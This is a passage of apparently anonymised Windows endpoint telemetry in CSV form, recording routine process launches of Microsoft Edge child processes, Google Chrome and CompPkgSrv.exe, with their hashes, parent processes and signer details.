+676,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:20.714261600+00:00,2021-06-24 00:53:26.875201700+00:00,064eede3-d4b3-4101-826c-d98501586345,computerpii_0a470890c60768167990033d701e7bd881398861,168010,False,10.7740.19041.1052,False,11540474045175127,,11540474045175158,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+677,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:20.712695+00:00,18796,msedge.exe,"""msedge.exe"" --type=crashpad-handler ""--user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler ""--database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Crashpad"" ""--metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.54 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7ffbe76706f8,0x7ffbe7670708,0x7ffbe7670718",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:20.892373700+00:00,2021-06-24 00:53:26.875371+00:00,1cde7d3e-8a1e-4b1c-8266-6132775112ff,computerpii_0a470890c60768167990033d701e7bd881398861,168013,False,10.7740.19041.1052,False,11540474045175158,,11540474045175159,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+678,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.034589700+00:00,20344,msedge.exe,"""msedge.exe"" --type=gpu-process --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2132 /prefetch:2",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.083483100+00:00,2021-06-24 00:53:26.875571200+00:00,fc837d33-240e-468b-9aa8-f6dd21372efc,computerpii_0a470890c60768167990033d701e7bd881398861,168017,False,10.7740.19041.1052,False,11540474045175158,,11540474045175160,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+679,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.042384+00:00,684,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.084071800+00:00,2021-06-24 00:53:26.875620+00:00,2dc15c9a-20d8-4306-86a8-6e6b0c29f640,computerpii_0a470890c60768167990033d701e7bd881398861,168018,False,10.7740.19041.1052,False,11540474045175158,,11540474045175161,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+680,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.123243200+00:00,19708,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.150147100+00:00,2021-06-24 00:53:26.875768800+00:00,e2657a3a-d83b-4652-b473-6a318af9d829,computerpii_0a470890c60768167990033d701e7bd881398861,168021,False,10.7740.19041.1052,False,11540474045175158,,11540474045175162,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+681,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.156577500+00:00,11920,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2832 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.209834100+00:00,2021-06-24 00:53:26.875967300+00:00,b835aea7-d13b-4b4b-8ff4-330915a5939d,computerpii_0a470890c60768167990033d701e7bd881398861,168025,False,10.7740.19041.1052,False,11540474045175158,,11540474045175163,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+682,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.339353200+00:00,2021-06-24 00:53:26.876165700+00:00,8a195e50-cd91-4d69-bfe6-b2d713c50b02,computerpii_0a470890c60768167990033d701e7bd881398861,168029,False,10.7740.19041.1052,False,11540474045175127,,11540474045175164,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+683,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.390918+00:00,17240,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.429529900+00:00,2021-06-24 00:53:26.876214800+00:00,325e538e-244f-4326-b669-be50e4756d4c,computerpii_0a470890c60768167990033d701e7bd881398861,168030,False,10.7740.19041.1052,False,11540474045175158,,11540474045175166,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+684,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.396708100+00:00,11040,CompPkgSrv.exe,CompPkgSrv.exe -Embedding,PortableExecutable,2021-02-17 04:34:40.332052600+00:00,C:\Windows\System32\CompPkgSrv.exe,214528,ceff6949f934d465db8f19b07e81ac78,34d5f40785a62bb26b49976212cce6673bf0cca04f50038626c704236f497e13,a4a1673048b1cdd49a1862f5c384af028e8ced07,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.432375500+00:00,2021-06-24 00:53:26.876418600+00:00,1b4ce4b6-1b89-4737-98dd-dfde1f8b7fc8,computerpii_0a470890c60768167990033d701e7bd881398861,168031,False,10.7740.19041.1052,False,11540474045136908,,11540474045175167,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,Component Package Support Server,CompPkgSrv.exe,Component Package Support Server
+685,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.399220100+00:00,6256,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:21.432661500+00:00,2021-06-24 00:53:26.876478800+00:00,f7cb19c6-2c85-4feb-9c3c-7326d41a298a,computerpii_0a470890c60768167990033d701e7bd881398861,168032,False,10.7740.19041.1052,False,11540474045175158,,11540474045175168,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 